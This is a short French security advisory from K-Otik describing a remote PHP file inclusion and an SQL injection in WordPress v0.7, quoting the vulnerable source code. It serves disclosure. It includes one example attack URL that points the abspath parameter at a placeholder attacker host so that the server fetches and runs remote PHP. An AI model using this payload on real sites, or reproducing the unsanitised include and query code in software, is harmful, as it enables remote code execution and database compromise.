Wordpress v0.7 Multiple Vulnerabilities

 Date de Publication: 2003-06-06
 Titre: Wordpress v0.7 Multiple Vulnerabilities
 K-Otik ID : 0151
 Exploitable à distance : Oui
 Exploitable en local : Oui
 

 
 

 * Description Technique - Exploit *
 
WordPress est un outil de publication développé en PHP. Deux faille touchent WordPress : La première est de type PHP Include présente dans le fichier links.all.php,ce qui permet l'inclusion d'un fichier php distant :

http://vulnerable/wp-links/links.all.php?abspath=http://attaquant/blog.header.php

La seconde faille est de type SQL Injection présente dans le fichier blog.header.php, ce qui pourrait permettre à un attaquant distant d'exécuter des commandes à travers la variable "posts".

wp-links/links.all.php:
---------------------------------------------------------------------
$blog = 1;
require($abspath.'/blog.header.php');
require_once('links.php');
$query = "SELECT cat_id, cat_name FROM $tablelinkcategories
ORDER BY cat_name";
---------------------------------------------------------------------

blog.header.php:

---------------------------------------------------------------------
if ($posts)
 $posts_per_page=$posts;
(..)
$limits = ' LIMIT '.$posts_per_page;
(..)
$request = " SELECT $distinct * FROM $tableposts WHERE 1=1"
$where." ORDER
BY post_$orderby $limits";
(..)
$result = mysql_query($request);
---------------------------------------------------------------------


  * Versions Vulnérables *

 Wordpress v0.7
  
  * Solution *

http://www.wordpress.org


  * Crédits *
 
Failles découverte par FraMe Murphy (Juin 2003).

 

Audits de Sécurité & Tests Intrusifs F-VNS Security™ Mailing Listes Advisories Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits